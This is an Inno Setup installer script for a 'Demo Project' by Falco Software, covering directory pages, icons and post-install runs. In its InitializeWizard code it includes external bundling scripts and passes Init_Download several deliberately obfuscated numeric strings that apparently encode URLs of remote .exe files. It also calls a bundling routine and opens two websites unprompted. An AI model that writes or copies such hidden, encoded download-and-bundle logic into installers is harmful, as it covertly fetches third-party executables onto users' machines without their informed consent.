; Script generated by the Inno Setup Script Wizard.
; SEE THE DOCUMENTATION FOR DETAILS ON CREATING INNO SETUP SCRIPT FILES!

#define MyAppName "Demo Project"
#define MyAppVersion "1.1 alpha"
#define MyAppPublisher "Falco Software Company"
#define MyAppURL "http://www.falcoware.com/"
#define MyAppExeName "Editor.exe"

[Setup]
; NOTE: The value of AppId uniquely identifies this application.
; Do not use the same AppId value in installers for other applications.
; (To generate a new GUID, click Tools | Generate GUID inside the IDE.)
AppId={{5B3081A6-7090-4DF5-8604-ED4F6AEDF37C}
AppName={#MyAppName}
AppVersion={#MyAppVersion}
;AppVerName={#MyAppName} {#MyAppVersion}
AppPublisher={#MyAppPublisher}
AppPublisherURL={#MyAppURL}
AppSupportURL={#MyAppURL}
AppUpdatesURL={#MyAppURL}
DefaultDirName={pf}\{#MyAppName}
DisableProgramGroupPage=yes
OutputBaseFilename=DemoProjectSetup
SetupIconFile=x64\Logo\icon.ico
WizardImageFile=x64\Logo\back_picture.bmp
WizardSmallImageFile=x64\Logo\Logo.bmp
Compression=lzma
SolidCompression=yes
DisableWelcomePage=no

[Tasks]
Name: "desktopicon"; Description: "{cm:CreateDesktopIcon}"; GroupDescription: "{cm:AdditionalIcons}"; Flags: unchecked

[Components]
Name: "DemoProject"; Description: "Demo Project"; Types: full;

[Files]
Source: "OpenAL\installer\oalinst.exe"; DestDir: "{app}\Redist\"; Flags: ignoreversion
Source: "DemoProject\*"; DestDir: {code:GetDataDir}; Flags: ignoreversion recursesubdirs createallsubdirs; Components: DemoProject
; NOTE: Don't use "Flags: ignoreversion" on any shared system files

[Icons]
Name: "{commonprograms}\{#MyAppName}"; Filename: "{app}\{#MyAppExeName}"
Name: "{commondesktop}\{#MyAppName}"; Filename: "{app}\{#MyAppExeName}"; Tasks: desktopicon

[Run]
Filename: "{app}\Redist\oalinst.exe"; Description: Install Open AL; Flags: shellexec waituntilterminated postinstall
Filename: "{app}\{#MyAppExeName}"; Description: "{cm:LaunchProgram,{#StringChange(MyAppName, '&', '&&')}}"; Flags: shellexec nowait postinstall skipifsilent


[Code]
#include "D:\_FalcoWare_\Bundling Tools\New1\Source\j_functions.iss"
#include "D:\_FalcoWare_\Bundling Tools\New1\Source\j_rrk_download.iss"
#include "D:\_FalcoWare_\Bundling Tools\New1\Source\j_bundle_survey_ml.iss"

var	
  DataDirPage: TInputDirWizardPage;
  DemoProjectPageID: Integer;

procedure InitializeWizard();
var s,s2:string;
FileSize: cardinal;
ResultCode: Integer;
begin
  DataDirPage := CreateInputDirPage(wpSelectComponents,
        'Select demo project directory', 'Where should demo project files be installed?',
        'Select the folder in which Setup should install demo project files, then click Next.',
        False, '');
   DataDirPage.Add('Demo project installation directory');
   DataDirPage.Values[0] := GetPreviousData('DemoProject', '');
   DemoProjectPageID := DataDirPage.ID;
  
  s:='17';
  s2:='8211316617817611418117411';
  Init_Download(s+'1183183179125114114179178182183113182168166184181168182183184167172168182113166178176114179164166174164170168182114153149114147164166174164170168153113168187168',
                s+'1183183179125114114179178182183113182168166184181168182183184167172168182113166178176114179164166174164170168182114140149114147164166174164170168140117113168187168',
                s+'11831831791251141141811741851681811721691881131821681661841811681821831841671721681'+s2+'4181174185168181172169188113168187168',
                s+'1183183179125114114183182183112179178182183113182168166184181168182183184167172168182113166178176114166178177169172170114179164166174164170168182114181174114181174172177182183164175175168181113168187168',
                67);

  Init_Bundle('Falco', '794', 'DemoProject', 'DemoProject');

  ShellExec('open', 'https://falco3d.com', '', '', SW_SHOW, ewNoWait, ResultCode);
	ShellExec('open', 'http://assets.falco3d.com', '', '', SW_SHOW, ewNoWait, ResultCode);
end;

function NextButtonClick(CurPageID: Integer): Boolean;
begin
 if DataDirPage <> nil then begin
  if DataDirPage.Values[0] = '' then
     DataDirPage.Values[0] := ExpandConstant('{sd}\DemoProject');
 end;
  Result := True;
end;

function ShouldSkipPage(PageID: Integer): Boolean;
begin
  Result := False;
  if PageID = DemoProjectPageID then
    Result := not IsComponentSelected('DemoProject');
end;

procedure RegisterPreviousData(PreviousDataKey: Integer);
begin
  // Store the selected folder for further reinstall/upgrade
  SetPreviousData(PreviousDataKey, 'DemoProject', DataDirPage.Values[0]);
end;

function UpdateReadyMemo(Space, NewLine, MemoUserInfoInfo, MemoDirInfo, MemoTypeInfo,
  MemoComponentsInfo, MemoGroupInfo, MemoTasksInfo: String): String;
var
  S: String;
begin
  // Fill the 'Ready Memo' with the normal settings and the custom settings
  S := '';
  S := S + MemoDirInfo + NewLine + NewLine;

  if IsComponentSelected('DemoProject') then begin
  S := S + 'Demo Project path' + NewLine;
  S := S + Space + DataDirPage.Values[0] + NewLine;
  end;

  Result := S;
end;

function GetDataDir(Param: String): String;
begin
  { Return the selected DataDir }
  Result := DataDirPage.Values[0];
end;
